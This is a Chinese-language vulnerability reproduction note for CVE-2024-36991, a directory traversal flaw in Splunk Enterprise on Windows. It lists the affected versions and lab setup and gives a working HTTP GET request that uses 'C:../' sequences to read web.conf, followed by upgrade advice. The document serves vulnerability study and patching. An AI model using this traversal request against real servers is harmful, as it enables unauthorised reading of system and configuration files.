Splunk Enterprise Windows 平台 messaging 目录遍历漏洞 CVE-2024-36991

漏洞描述

Splunk Enterprise 是一款强大的数据分析软件,它允许用户从各种来源收集、索引和搜索机器生成的数据。2024 年 7 月,官方发布安全通告,披露 CVE-2024-36991 Splunk Enterprise Windows 平台 /modules/messaging 目录遍历漏洞。漏洞仅影响 Windows 平台上的 Splunk Enterprise。

参考链接:

漏洞影响

9.2.0 <= Splunk Enterprise < 9.2.2
9.1.0 <= Splunk Enterprise < 9.1.5
9.0.0 <= Splunk Enterprise < 9.0.10

环境搭建

官网 下载安装 Splunk Enterprise 9.2.1,搭建完成后,访问 your-ip:8000,即可看到 Splunk Enterprise 的登录页面。

漏洞复现

Splunk Enterprise 中, 8000 端口 和 8089 端口 分别用于 Web UI 和 后台管理 API。可以通过 8089 端口查看版本号:

通过 8000 端口读取配置文件 $SPLUNK_HOME/etc/system/default/web.conf

GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/default/web.conf HTTP/1.1
Host: 10.10.11.61:8000
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

漏洞修复

官方已发布安全更新,建议升级至最新版本。